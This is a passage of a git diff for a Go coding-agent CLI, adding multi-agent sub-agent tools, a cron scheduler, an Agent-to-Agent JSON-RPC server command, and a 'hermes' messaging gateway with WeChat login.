+		registry.Register(tools.NewA2ADispatchTool(&a2aDispatcherAdapter{mgr: a2aMgr}))
+		if opts.verbose {
+			fmt.Fprintf(os.Stderr, "A2A master mode enabled: %d agents loaded from %s\n", len(a2aMgr.List()), a2aListPath)
+		}
+	}
+
+	// Multi-agent mode: create AgentFactory and AgentManager, register subagent tools
+	var agentMgr *agent.AgentManager
+	var cronStore cron.CronStore
+	var cronScheduler *cron.Scheduler
+	if opts.multiAgent {
+		compactionSettings := ctxpkg.CompactionSettings{
+			Enabled:          settings.Compaction.Enabled,
+			ReserveTokens:    settings.Compaction.ReserveTokens,
+			KeepRecentTokens: settings.Compaction.KeepRecentTokens,
+		}
+		if compactionSettings.ReserveTokens == 0 {
+			compactionSettings.ReserveTokens = 16384
+		}
+		if compactionSettings.KeepRecentTokens == 0 {
+			compactionSettings.KeepRecentTokens = 20000
+		}
+
+		factory := agent.NewAgentFactory(p, model, settings, sbMgr, extraContext, compactionSettings, nil)
+		agentMgr = agent.NewAgentManager(factory)
+
+		// Register subagent tools
+		registry.Register(agent.NewSubAgentSpawnTool(agentMgr))
+		registry.Register(agent.NewSubAgentStatusTool(agentMgr))
+		registry.Register(agent.NewSubAgentSendTool(agentMgr))
+		registry.Register(agent.NewSubAgentDestroyTool(agentMgr))
+
+		// Create cron store, scheduler, and tool
+		cronPath := filepath.Join(config.ConfigDir(), "cron.json")
+		cronStore = cron.NewFileCronStore(cronPath)
+		cronScheduler = cron.NewScheduler(cronStore, agentMgr, 30*time.Second)
+		cronScheduler.Start()
+		registry.Register(cron.NewCronTool(cronStore, cronScheduler))
+		defer cronScheduler.Stop()
+
+		if opts.verbose {
+			fmt.Fprintf(os.Stderr, "Multi-agent mode enabled\n")
+		}
+	}
+
 	// Print mode: non-interactive
 	if opts.print {
-		return runPrint(args, p, model, mode, provider.ThinkingLevel(thinkingLevel), settings, registry, sess, extraContext)
+		return runPrint(args, p, model, mode, provider.ThinkingLevel(thinkingLevel), settings, registry, sess, extraContext, opts.multiAgent, agentMgr)
 	}
 
 	// Interactive mode
 	// Clear any pending stdin input (e.g., terminal color queries)
 	clearStdin()
 
-	app := tui.NewApp(p, model, settings, sess, registry, sbInfo, extraContext, skillsMgr, mode)
+	app := tui.NewApp(p, model, settings, sess, registry, sbInfo, extraContext, skillsMgr, mode, opts.multiAgent, agentMgr, cronStore, cronScheduler)
 	// Add context files info and session info as initial message
 	var initialMsg string
 	if contextFilesInfo != "" {
@@ -352,298 +492,20 @@ func run(args []string, opts runOptions) error {
 	return nil
 }
 
-// createProvider creates a provider from config based on provider name.
-func createProvider(settings *config.Settings, providerName, modelID string) (provider.Provider, *provider.Model, error) {
-	// Check if provider is in config
-	pc := settings.GetProviderConfig(providerName)
-
-	if pc != nil {
-		// Custom provider from config
-		apiKey := settings.ResolveKey(providerName)
-		models := convertModelConfigs(providerName, pc.Models)
-
-		api := pc.API
-		if api == "" {
-			// Auto-detect: if baseUrl contains "anthropic", use anthropic-messages
-			if strings.Contains(strings.ToLower(pc.BaseURL), "anthropic") {
-				api = "anthropic-messages"
-			} else {
-				api = "openai-chat"
-			}
-		}
-
-		var p provider.Provider
-		switch api {
-		case "anthropic-messages":
-			ap := anthropic.NewProviderWithModels(apiKey, pc.BaseURL, models)
-			if pc.ThinkingFormat != "" {
-				ap.SetThinkingFormat(pc.ThinkingFormat)
-			}
-			if pc.CacheControl != nil {
-				ap.SetCacheControlEnabled(pc.CacheControl)
-			}
-			p = ap
-		case "openai-chat", "openai":
-			op := openai.NewProviderWithModels(apiKey, pc.BaseURL, models)
-			if pc.ThinkingFormat != "" {
-				op.SetThinkingFormat(pc.ThinkingFormat)
-			}
-			p = op
-		default:
-			return nil, nil, fmt.Errorf("unsupported API type: %s (use 'openai-chat' or 'anthropic-messages')", api)
-		}
-
-		// Find model
-		model := p.GetModel(modelID)
-		if model == nil {
-			if len(models) > 0 {
-				model = models[0]
-			} else {
-				return nil, nil, fmt.Errorf("no models configured for provider %s", providerName)
-			}
-		}
-
-		return p, model, nil
-	}
-
-	// Built-in providers (fallback)
-	var p provider.Provider
-	switch strings.ToLower(providerName) {
-	case "openai":
-		apiKey := settings.ResolveKey(providerName)
-		p = openai.NewProvider(apiKey, "")
-	case "anthropic":
-		apiKey := settings.ResolveKey(providerName)
-		p = anthropic.NewProvider(apiKey, "")
-	default:
-		return nil, nil, fmt.Errorf("unknown provider: %s (add it to settings.json providers section)", providerName)
-	}
-
-	model := p.GetModel(modelID)
-	if model == nil {
-		models := p.Models()
-		if len(models) > 0 {
-			model = models[0]
-		} else {
-			return nil, nil, fmt.Errorf("no models available for provider %s", providerName)
-		}
-	}
-
-	return p, model, nil
+// a2aDispatcherAdapter adapts a2a.A2AManager to tools.A2ADispatcher.
+type a2aDispatcherAdapter struct {
+	mgr *a2a.A2AManager
 }
 
-// convertModelConfigs converts config.ModelConfig to provider.Model.
-func convertModelConfigs(providerName string, models []config.ModelConfig) []*provider.Model {
-	var result []*provider.Model
-	for _, m := range models {
-		input := m.Input
-		if len(input) == 0 {
-			input = []string{"text"}
-		}
-		var cost provider.ModelPricing
-		if m.Cost != nil {
-			cost = provider.ModelPricing{
-				Input:      m.Cost.Input,
-				Output:     m.Cost.Output,
-				CacheRead:  m.Cost.CacheRead,
-				CacheWrite: m.Cost.CacheWrite,
-			}
-		}
-		result = append(result, &provider.Model{
-			ID:            m.ID,
-			Name:          m.Name,
-			Provider:      providerName,
-			Reasoning:     m.Reasoning,
-			Input:         input,
-			Cost:          cost,
-			ContextWindow: m.ContextWindow,
-			MaxTokens:     m.MaxTokens,
-		})
+func (a *a2aDispatcherAdapter) List() []tools.AgentEntry {
+	entries := a.mgr.List()
+	result := make([]tools.AgentEntry, len(entries))
+	for i, e := range entries {
+		result[i] = tools.AgentEntry{Name: e.Name, URL: e.URL}
 	}
 	return result
 }
 
-// clearStdin reads and discards any pending input from stdin.
-// This is needed because some terminals send color query sequences on startup.
-func clearStdin() {
-	// Set a short read deadline so pending reads time out cleanly.
-	// Some stdin types (pipes, certain PTYs) don't support deadlines;
-	// if SetReadDeadline fails we skip clearing to avoid blocking forever.
-	if err := os.Stdin.SetReadDeadline(time.Now().Add(50 * time.Millisecond)); err != nil {
-		return
-	}
-	defer os.Stdin.SetReadDeadline(time.Time{}) // Clear deadline
-	buf := make([]byte, 128)
-	for {
-		n, err := os.Stdin.Read(buf)
-		if n == 0 || err != nil {
-			return
-		}
-	}
-}
-
-func runPrint(args []string, p provider.Provider, model *provider.Model, mode string, thinkingLevel provider.ThinkingLevel, settings *config.Settings, registry *tools.Registry, sess *session.Manager, extraContext string) error {
-	input := strings.Join(args, " ")
-	if input == "" {
-		data, err := io.ReadAll(os.Stdin)
-		if err != nil {
-			return fmt.Errorf("no input provided")
-		}
-		input = string(data)
-	}
-
-	fmt.Fprintf(os.Stderr, "Using %s/%s in %s mode\n", p.Name(), model.ID, mode)
-
-	// Create glamour renderer for markdown
-	wordWrap := 80
-	if w, _, err := term.GetSize(int(os.Stdout.Fd())); err == nil && w > 0 {
-		wordWrap = w
-	}
-	renderer, err := glamour.NewTermRenderer(
-		glamour.WithAutoStyle(),
-		glamour.WithWordWrap(wordWrap),
-	)
-	if err != nil {
-		debugLog("Failed to create glamour renderer: %v", err)
-		renderer = nil
-	}
-
-	compactionSettings := ctxpkg.CompactionSettings{
-		Enabled:          settings.Compaction.Enabled,
-		ReserveTokens:    settings.Compaction.ReserveTokens,
-		KeepRecentTokens: settings.Compaction.KeepRecentTokens,
-	}
-	if compactionSettings.ReserveTokens == 0 {
-		compactionSettings.ReserveTokens = 16384
-	}
-	if compactionSettings.KeepRecentTokens == 0 {
-		compactionSettings.KeepRecentTokens = 20000
-	}
-
-	agentCfg := agent.Config{
-		Provider:           p,
-		Model:              model,
-		Mode:               mode,
-		ThinkingLevel:      thinkingLevel,
-		MaxTokens:          settings.MaxOutputTokens,
-		Settings:           settings,
-		Session:            sess,
-		ExtraContext:       extraContext,
-		CompactionSettings: compactionSettings,
-	}
-
-	a := agent.New(agentCfg, registry)
-
-	ctx := context.Background()
-	eventCh := a.Run(ctx, input)
-
-	var textBuffer strings.Builder
-
-	for event := range eventCh {
-		switch event.Type {
-		case agent.EventToolApprovalRequest:
-			return fmt.Errorf("tool approval required in print mode for %s; rerun interactively, use --mode yolo, or whitelist the command", event.ApprovalTool)
-		case agent.EventTextDelta:
-			textBuffer.WriteString(event.TextDelta)
-		case agent.EventToolCall:
-			// Flush text buffer before tool call
-			if textBuffer.Len() > 0 {
-				flushTextBuffer(&textBuffer, renderer)
-			}
-			fmt.Fprintf(os.Stderr, "\n[tool: %s]\n", event.ToolCall.Name)
-		case agent.EventToolExecutionStart:
-			fmt.Fprintf(os.Stderr, "[running: %s] ", event.ToolName)
-		case agent.EventToolExecutionEnd:
-			if event.ToolError != nil {
-				fmt.Fprintf(os.Stderr, "error: %v\n", event.ToolError)
-			} else {
-				fmt.Fprintf(os.Stderr, "done\n")
-			}
-		case agent.EventToolResult:
-			// Show full tool result for bash commands
-			if event.ToolName == "bash" {
-				fmt.Fprintf(os.Stderr, "\n%s\n", event.ToolResult)
-			}
-		case agent.EventDone:
-			// Flush remaining text buffer
-			if textBuffer.Len() > 0 {
-				flushTextBuffer(&textBuffer, renderer)
-			}
-			// Show context usage
-			if event.ContextUsage != nil && event.ContextUsage.Percent != nil {
-				fmt.Fprintf(os.Stderr, "\nContext: %.1f%%/%s\n",
-					*event.ContextUsage.Percent,
-					formatTokenCount(event.ContextUsage.ContextWindow))
-			}
-		case agent.EventError:
-			// Flush text buffer before error
-			if textBuffer.Len() > 0 {
-				flushTextBuffer(&textBuffer, renderer)
-			}
-			if event.Error != nil {
-				return event.Error
-			}
-		case agent.EventUsage:
-			if event.ContextUsage != nil && event.ContextUsage.Percent != nil {
-				fmt.Fprintf(os.Stderr, "Context: %.1f%%/%s | ",
-					*event.ContextUsage.Percent,
-					formatTokenCount(event.ContextUsage.ContextWindow))
-			}
-			if event.Usage != nil {
-				cacheInfo := ""
-				if info := event.Usage.CacheInfo(); info != "" {
-					cacheInfo = " | " + info
-				}
-				fmt.Fprintf(os.Stderr, "Tokens: %d↓/%d↑ $%.4f%s\n",
-					event.Usage.TotalInputTokens(), event.Usage.Output, event.Usage.Cost.Total, cacheInfo)
-			}
-		case agent.EventCompactionStart:
-			fmt.Fprintf(os.Stderr, "\n⏳ Compacting context...\n")
-		case agent.EventCompactionEnd:
-			if event.Error != nil {
-				fmt.Fprintf(os.Stderr, "Compaction failed: %v\n", event.Error)
-			} else if event.StatusMessage != "" {
-				fmt.Fprintf(os.Stderr, "✅ %s\n", event.StatusMessage)
-			} else {
-				fmt.Fprintf(os.Stderr, "✅ Context compacted\n")
-			}
-		}
-	}
-
-	return nil
-}
-
-// flushTextBuffer renders and prints the accumulated text buffer.
-func flushTextBuffer(buffer *strings.Builder, renderer *glamour.TermRenderer) {
-	text := buffer.String()
-	buffer.Reset()
-
-	if renderer != nil {
-		rendered, err := renderer.Render(text)
-		if err != nil {
-			// Fallback to plain text
-			fmt.Print(text)
-		} else {
-			fmt.Print(rendered)
-		}
-	} else {
-		fmt.Print(text)
-	}
-}
-
-// formatTokenCount formats a token count for display.
-func formatTokenCount(count int) string {
-	if count < 1000 {
-		return fmt.Sprintf("%d", count)
-	}
-	if count < 10000 {
-		return fmt.Sprintf("%.1fk", float64(count)/1000)
-	}
-	if count < 1000000 {
-		return fmt.Sprintf("%dk", count/1000)
-	}
-	if count < 10000000 {
-		return fmt.Sprintf("%.1fM", float64(count)/1000000)
-	}
-	return fmt.Sprintf("%dM", count/1000000)
+func (a *a2aDispatcherAdapter) Dispatch(ctx context.Context, name, message string) (string, error) {
+	return a.mgr.Dispatch(ctx, name, message)
 }
diff --git a/cmd/vibecoding/main_a2a.go b/cmd/vibecoding/main_a2a.go
new file mode 100644
index 0000000..059191f
--- /dev/null
+++ b/cmd/vibecoding/main_a2a.go
@@ -0,0 +1,294 @@
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"os"
+	"strings"
+	"time"
+
+	"github.com/spf13/cobra"
+
+	"github.com/startvibecoding/vibecoding/internal/a2a"
+	"github.com/startvibecoding/vibecoding/internal/agent"
+	"github.com/startvibecoding/vibecoding/internal/config"
+	"github.com/startvibecoding/vibecoding/internal/provider"
+	providerfactory "github.com/startvibecoding/vibecoding/internal/provider/factory"
+	"github.com/startvibecoding/vibecoding/internal/sandbox"
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+// newA2ACommand builds the "a2a" command tree.
+func newA2ACommand() *cobra.Command {
+	var (
+		flagPort          int
+		flagWorkDir       string
+		flagProvider      string
+		flagModel         string
+		flagSandbox       bool
+		flagAuthToken     string
+		flagInitA2AConfig bool
+		flagForce         bool
+	)
+
+	a2aCmd := &cobra.Command{
+		Use:   "a2a",
+		Short: "Run the A2A (Agent-to-Agent) server",
+		Long:  "Start VibeCoding A2A Server — a JSON-RPC 2.0 endpoint for other agents to send tasks.",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			if flagInitA2AConfig {
+				path, err := a2a.InitA2AConfig(flagForce)
+				if err != nil {
+					return err
+				}
+				fmt.Fprintf(os.Stderr, "Created a2a config: %s\n", path)
+				return nil
+			}
+			return cmd.Help()
+		},
+	}
+
+	a2aFlags := a2aCmd.Flags()
+	a2aFlags.BoolVar(&flagInitA2AConfig, "init-a2a-config", false, "Create a2a.json config template")
+	a2aFlags.BoolVar(&flagForce, "force", false, "Force overwrite existing files (used with --init-a2a-config)")
+
+	// --- start ---
+
+	startCmd := &cobra.Command{
+		Use:   "start",
+		Short: "Start the A2A server",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			cfg := a2a.DefaultConfig()
+
+			if flagPort != 0 {
+				cfg.Port = flagPort
+			}
+			if flagWorkDir != "" {
+				cfg.WorkDir = flagWorkDir
+			}
+			if flagAuthToken != "" {
+				cfg.AuthToken = flagAuthToken
+			}
+
+			// Resolve working directory
+			if cfg.WorkDir == "" || cfg.WorkDir == "." {
+				cwd, err := os.Getwd()
+				if err != nil {
+					return fmt.Errorf("get working directory: %w", err)
+				}
+				cfg.WorkDir = cwd
+			}
+
+			// Load settings for provider
+			settings, err := config.LoadSettings()
+			if err != nil {
+				return fmt.Errorf("load settings: %w", err)
+			}
+
+			providerName := flagProvider
+			if providerName == "" {
+				providerName = settings.DefaultProvider
+			}
+			modelID := flagModel
+			if modelID == "" {
+				modelID = settings.DefaultModel
+			}
+
+			// Create provider (lazy import to avoid circular deps)
+			// For now, we use a simple factory that wraps the agent creation
+			factory := &simpleAgentFactory{
+				settings: settings,
+				provider: providerName,
+				model:    modelID,
+				workDir:  cfg.GetWorkDir(),
+				sandbox:  flagSandbox,
+			}
+
+			executor := a2a.NewDefaultExecutor(factory)
+			return a2a.Run(cfg, version, executor)
+		},
+	}
+
+	startFlags := startCmd.Flags()
+	startFlags.IntVar(&flagPort, "port", 0, "Listen port (default: 8093)")
+	startFlags.StringVar(&flagWorkDir, "work-dir", "", "Default working directory")
+	startFlags.StringVarP(&flagProvider, "provider", "p", "", "Default provider name")
+	startFlags.StringVarP(&flagModel, "model", "m", "", "Default model ID")
+	startFlags.BoolVar(&flagSandbox, "sandbox", false, "Enable sandbox mode (bwrap)")
+	startFlags.StringVar(&flagAuthToken, "auth-token", "", "Bearer token for authentication")
+
+	// --- stop ---
+
+	stopCmd := &cobra.Command{
+		Use:   "stop",
+		Short: "Stop the A2A server",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			// Reuse hermes PID file pattern but for A2A
+			// For simplicity, use HTTP health check
+			cfg := a2a.DefaultConfig()
+			url := fmt.Sprintf("http://%s/.well-known/agent.json", cfg.GetListenAddr())
+			client := &http.Client{Timeout: 2 * time.Second}
+			_, err := client.Get(url)
+			if err != nil {
+				return fmt.Errorf("A2A server is not running (cannot reach %s)", url)
+			}
+			fmt.Fprintf(os.Stderr, "A2A server is running at %s\n", cfg.GetListenAddr())
+			fmt.Fprintf(os.Stderr, "Note: Use Ctrl+C or kill the process to stop.\n")
+			return nil
+		},
+	}
+
+	// --- status ---
+
+	statusCmd := &cobra.Command{
+		Use:   "status",
+		Short: "Show A2A server status",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			cfg := a2a.DefaultConfig()
+			url := fmt.Sprintf("http://%s/.well-known/agent.json", cfg.GetListenAddr())
+			client := &http.Client{Timeout: 2 * time.Second}
+			resp, err := client.Get(url)
+			if err != nil {
+				fmt.Fprintf(os.Stderr, "A2A server is not running (cannot reach %s)\n", url)
+				return nil
+			}
+			defer resp.Body.Close()
+
+			var card a2a.AgentCard
+			json.NewDecoder(resp.Body).Decode(&card)
+			fmt.Fprintf(os.Stderr, "A2A server is running at %s\n", cfg.GetListenAddr())
+			fmt.Fprintf(os.Stderr, "  Name: %s\n", card.Name)
+			fmt.Fprintf(os.Stderr, "  Version: %s\n", card.Version)
+			fmt.Fprintf(os.Stderr, "  Skills: %d\n", len(card.Skills))
+			for _, s := range card.Skills {
+				fmt.Fprintf(os.Stderr, "    - %s: %s\n", s.Name, s.Description)
+			}
+			return nil
+		},
+	}
+
+	// --- card ---
+
+	cardCmd := &cobra.Command{
+		Use:   "card",
+		Short: "Show or generate the Agent Card",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			cfg := a2a.DefaultConfig()
+			card := a2a.DefaultAgentCard(version, fmt.Sprintf("http://%s", cfg.GetListenAddr()))
+			data, _ := json.MarshalIndent(card, "", "  ")
+			fmt.Println(string(data))
+			return nil
+		},
+	}
+
+	a2aCmd.AddCommand(startCmd, stopCmd, statusCmd, cardCmd)
+
+	// --- send ---
+
+	var flagTarget string
+
+	sendCmd := &cobra.Command{
+		Use:   "send <message>",
+		Short: "Send a message to an A2A server",
+		Args:  cobra.MinimumNArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			msg := strings.Join(args, " ")
+			target := flagTarget
+			if target == "" {
+				target = "http://localhost:8093"
+			}
+
+			client := a2a.NewClient(target, flagAuthToken)
+			task, err := client.SendMessage(cmd.Context(), "", &a2a.Message{
+				Role:  "user",
+				Parts: []a2a.MessagePart{{Type: "text", Text: msg}},
+			})
+			if err != nil {
+				return fmt.Errorf("send message: %w", err)
+			}
+
+			// Print response
+			if len(task.Artifacts) > 0 {
+				for _, a := range task.Artifacts {
+					for _, p := range a.Parts {
+						if p.Type == "text" {
+							fmt.Println(p.Text)
+						}
+					}
+				}
+			} else if task.Message != nil {
+				for _, p := range task.Message.Parts {
+					if p.Type == "text" {
+						fmt.Println(p.Text)
+					}
+				}
+			}
+			return nil
+		},
+	}
+	sendCmd.Flags().StringVar(&flagTarget, "target", "", "A2A server URL (default: http://localhost:8093)")
+	sendCmd.Flags().StringVar(&flagAuthToken, "auth-token", "", "Bearer token")
+
+	// --- discover ---
+
+	discoverCmd := &cobra.Command{
+		Use:   "discover <url>",
+		Short: "Discover an A2A server's Agent Card",
+		Args:  cobra.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			client := a2a.NewClient(args[0], flagAuthToken)
+			card, err := client.GetAgentCard(cmd.Context())
+			if err != nil {
+				return fmt.Errorf("discover: %w", err)
+			}
+			data, _ := json.MarshalIndent(card, "", "  ")
+			fmt.Println(string(data))
+			return nil
+		},
+	}
+
+	a2aCmd.AddCommand(sendCmd, discoverCmd)
+	return a2aCmd
+}
+
+// simpleAgentFactory creates agents for A2A task execution.
+// This bridges the a2a package to the agent package.
+type simpleAgentFactory struct {
+	settings *config.Settings
+	provider string
+	model    string
+	workDir  string
+	sandbox  bool
+}
+
+func (f *simpleAgentFactory) CreateForA2A(workDir string, mode string) (*agent.Agent, error) {
+	if workDir == "" {
+		workDir = f.workDir
+	}
+
+	p, model, err := createProviderForA2A(f.settings, f.provider, f.model)
+	if err != nil {
+		return nil, fmt.Errorf("create provider: %w", err)
+	}
+
+	sbMgr := sandbox.NewManager(workDir)
+	if f.sandbox {
+		sbMgr.SetLevel(sandbox.LevelStandard)
+	}
+
+	a := agent.New(agent.Config{
+		Provider:   p,
+		Model:      model,
+		Mode:       mode,
+		SandboxMgr: sbMgr,
+		Settings:   f.settings,
+	}, tools.NewRegistry(workDir, sbMgr.GetActive()))
+
+	return a, nil
+}
+
+// createProviderForA2A creates a provider for A2A task execution.
+func createProviderForA2A(settings *config.Settings, providerName, modelID string) (provider.Provider, *provider.Model, error) {
+	return providerfactory.Create(settings, providerName, modelID)
+}
diff --git a/cmd/vibecoding/main_cron.go b/cmd/vibecoding/main_cron.go
new file mode 100644
index 0000000..c2fb998
--- /dev/null
+++ b/cmd/vibecoding/main_cron.go
@@ -0,0 +1,34 @@
+package main
+
+import (
+	"fmt"
+	"path/filepath"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+	"github.com/startvibecoding/vibecoding/internal/cron"
+)
+
+// openCronStore opens the hermes cron store file.
+func openCronStore() *cron.FileCronStore {
+	path := filepath.Join(config.ConfigDir(), "hermes-cron.json")
+	return cron.NewFileCronStore(path)
+}
+
+// setCronEnabled enables or disables a cron job by ID.
+func setCronEnabled(id string, enabled bool) error {
+	store := openCronStore()
+	job, err := store.Get(id)
+	if err != nil {
+		return err
+	}
+	job.Enabled = enabled
+	if err := store.Update(*job); err != nil {
+		return err
+	}
+	state := "enabled"
+	if !enabled {
+		state = "disabled"
+	}
+	fmt.Printf("✅ %s: [%s] %s\n", state, job.ID, job.Name)
+	return nil
+}
diff --git a/cmd/vibecoding/main_hermes.go b/cmd/vibecoding/main_hermes.go
new file mode 100644
index 0000000..d780848
--- /dev/null
+++ b/cmd/vibecoding/main_hermes.go
@@ -0,0 +1,575 @@
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"net/http"
+	"os"
+	"syscall"
+	"time"
+
+	"github.com/spf13/cobra"
+
+	"github.com/startvibecoding/vibecoding/internal/cron"
+	"github.com/startvibecoding/vibecoding/internal/hermes"
+	"github.com/startvibecoding/vibecoding/internal/memory"
+	"github.com/startvibecoding/vibecoding/internal/messaging/wechat"
+)
+
+// newHermesCommand builds the "hermes" command tree with all subcommands.
+func newHermesCommand() *cobra.Command {
+	var (
+		flagPort       int
+		flagWorkDir    string
+		flagConfig     string
+		flagProvider   string
+		flagModel      string
+		flagMultiAgent bool
+		flagSandbox    bool
+		flagDaemon     bool
+		flagVerbose    bool
+		flagDebug      bool
+		flagForce      bool
+	)
+
+	hermesCmd := &cobra.Command{
+		Use:   "hermes",
+		Short: "Run the Hermes messaging gateway",
+		Long:  "Start VibeCoding Hermes — a messaging gateway with WebSocket/HTTP API, WeChat, Feishu, and more.",
+	}
+
+	// --- start / stop / status ---
+
+	startCmd := &cobra.Command{
+		Use:   "start",
+		Short: "Start the Hermes daemon",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return hermes.Run(hermes.RunOptions{
+				ConfigPath: flagConfig,
+				Port:       flagPort,
+				WorkDir:    flagWorkDir,
+				Provider:   flagProvider,
+				Model:      flagModel,
+				MultiAgent: flagMultiAgent,
+				Sandbox:    flagSandbox,
+				Daemon:     flagDaemon,
+				Verbose:    flagVerbose,
+				Debug:      flagDebug,
+			}, version)
+		},
+	}
+
+	startFlags := startCmd.Flags()
+	startFlags.IntVar(&flagPort, "port", 0, "Listen port (default: from hermes.json or 8090)")
+	startFlags.StringVar(&flagWorkDir, "work-dir", "", "Default working directory")
+	startFlags.StringVar(&flagConfig, "config", "", "Path to hermes.json")
+	startFlags.StringVarP(&flagProvider, "provider", "p", "", "Default provider name (overrides hermes.json)")
+	startFlags.StringVarP(&flagModel, "model", "m", "", "Default model ID (overrides hermes.json)")
+	startFlags.BoolVar(&flagMultiAgent, "multi-agent", false, "Enable multi-agent mode (sub-agent tools)")
+	startFlags.BoolVar(&flagSandbox, "sandbox", false, "Enable sandbox mode (bwrap)")
+	startFlags.BoolVarP(&flagDaemon, "daemon", "d", false, "Run in background")
+	startFlags.BoolVar(&flagVerbose, "verbose", false, "Verbose output")
+	startFlags.BoolVar(&flagDebug, "debug", false, "Enable debug logging")
+
+	stopCmd := &cobra.Command{
+		Use:   "stop",
+		Short: "Stop the Hermes daemon",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			pid, err := hermes.ReadPIDFile()
+			if err != nil {
+				return fmt.Errorf("read PID file: %w", err)
+			}
+			if pid == 0 {
+				return fmt.Errorf("hermes is not running (no PID file found)")
+			}
+			proc, err := os.FindProcess(pid)
+			if err != nil {
+				return fmt.Errorf("find process %d: %w", pid, err)
+			}
+			if err := proc.Signal(syscall.SIGTERM); err != nil {
+				return fmt.Errorf("send SIGTERM to process %d: %w", pid, err)
+			}
+			fmt.Fprintf(os.Stderr, "Sent SIGTERM to hermes (PID %d)\n", pid)
+			return nil
+		},
+	}
+
+	statusCmd := &cobra.Command{
+		Use:   "status",
+		Short: "Show Hermes daemon status",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			pid, err := hermes.ReadPIDFile()
+			if err != nil {
+				return fmt.Errorf("read PID file: %w", err)
+			}
+			if pid == 0 {
+				fmt.Fprintln(os.Stderr, "Hermes is not running (no PID file found)")
+				return nil
+			}
+			// Check if process is alive
+			proc, err := os.FindProcess(pid)
+			if err != nil {
+				fmt.Fprintf(os.Stderr, "Hermes PID %d: process not found\n", pid)
+				return nil
+			}
+			if err := proc.Signal(syscall.Signal(0)); err != nil {
+				fmt.Fprintf(os.Stderr, "Hermes PID %d: not running\n", pid)
+				return nil
+			}
+			fmt.Fprintf(os.Stderr, "Hermes is running (PID %d)\n", pid)
+
+			// Try to query HTTP status
+			cfg, err := hermes.LoadHermesConfig()
+			if err == nil {
+				url := fmt.Sprintf("http://%s/api/health", cfg.GetListenAddr())
+				client := &http.Client{Timeout: 2 * time.Second}
+				resp, err := client.Get(url)
+				if err == nil {
+					defer resp.Body.Close()
+					var health map[string]any
+					json.NewDecoder(resp.Body).Decode(&health)
+					if v, ok := health["version"]; ok {
+						fmt.Fprintf(os.Stderr, "  Version: %v\n", v)
+					}
+					if v, ok := health["uptime_seconds"]; ok {
+						fmt.Fprintf(os.Stderr, "  Uptime: %v seconds\n", v)
+					}
+				}
+			}
+			return nil
+		},
+	}
+
+	// --- config ---
+
+	configCmd := &cobra.Command{
+		Use:   "config",
+		Short: "Manage Hermes configuration",
+	}
+
+	var flagProject, flagGlobal, flagWebhook bool
+
+	configInitCmd := &cobra.Command{
+		Use:   "init",
+		Short: "Create hermes.json config template",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			if flagProject && flagGlobal {
+				return fmt.Errorf("--project and --global are mutually exclusive")
+			}
+			if flagWebhook {
+				path, err := hermes.InitWebhookConfig(flagProject, flagForce)
+				if err != nil {
+					return err
+				}
+				fmt.Fprintf(os.Stderr, "Created webhook config: %s\n", path)
+				fmt.Fprintf(os.Stderr, "\nSample routes:\n")
+				fmt.Fprintf(os.Stderr, "  POST /webhook/github  — GitHub events (push, pull_request, issues)\n")
+				fmt.Fprintf(os.Stderr, "  POST /webhook/ci      — CI events (all types)\n")
+				fmt.Fprintf(os.Stderr, "\nSet WEBHOOK_SECRET env var or replace ${WEBHOOK_SECRET} in config.\n")
+				return nil
+			}
+			path, err := hermes.InitHermesConfig(flagProject, flagForce)
+			if err != nil {
+				return err
+			}
+			fmt.Fprintf(os.Stderr, "Created hermes config: %s\n", path)
+			return nil
+		},
+	}
+
+	configInitCmd.Flags().BoolVar(&flagProject, "project", false, "Write to .vibe/hermes.json")
+	configInitCmd.Flags().BoolVar(&flagGlobal, "global", false, "Write to global hermes.json (default)")
+	configInitCmd.Flags().BoolVar(&flagForce, "force", false, "Overwrite existing file")
+	configInitCmd.Flags().BoolVar(&flagWebhook, "webhook", false, "Include sample webhook routes (GitHub, CI)")
+
+	configShowCmd := &cobra.Command{
+		Use:   "show",
+		Short: "Show current effective configuration",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			cfg, err := hermes.LoadHermesConfig()
+			if err != nil {
+				return err
+			}
+			data, _ := json.MarshalIndent(cfg, "", "  ")
+			fmt.Println(string(data))
+			return nil
+		},
+	}
+
+	configCmd.AddCommand(configInitCmd, configShowCmd)
+
+	// --- client ---
+
+	var flagURL, flagSession string
+
+	clientCmd := &cobra.Command{
+		Use:   "client",
+		Short: "Connect to a running Hermes instance via WebSocket",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return hermes.RunClient(hermes.ClientOptions{
+				URL:       flagURL,
+				SessionID: flagSession,
+			})
+		},
+	}
+	clientCmd.Flags().StringVar(&flagURL, "url", "ws://localhost:8090/ws", "WebSocket URL to connect to")
+	clientCmd.Flags().StringVar(&flagSession, "session", "", "Session ID to resume")
+
+	// --- wechat ---
+
+	wechatCmd := &cobra.Command{
+		Use:   "wechat",
+		Short: "Manage WeChat iLink connection",
+	}
+
+	wechatLoginCmd := &cobra.Command{
+		Use:   "login",
+		Short: "Login to WeChat via QR code",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			cfg, err := hermes.LoadHermesConfig()
+			if err != nil {
+				return err
+			}
+			credPath := cfg.GetWechatCredPath()
+			client := wechat.NewClient()
+			_, err = wechat.Login(cmd.Context(), client, wechat.LoginOptions{
+				CredPath: credPath,
+				Force:    flagForce,
+			})
+			if err != nil {
+				return err
+			}
+			fmt.Fprintf(os.Stderr, "WeChat credentials saved to %s\n", credPath)
+			return nil
+		},
+	}
+	wechatLoginCmd.Flags().BoolVar(&flagForce, "force", false, "Force re-login even if credentials exist")
+
+	wechatStatusCmd := &cobra.Command{
+		Use:   "status",
+		Short: "Show WeChat connection status",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			cfg, err := hermes.LoadHermesConfig()
+			if err != nil {
+				return err
+			}
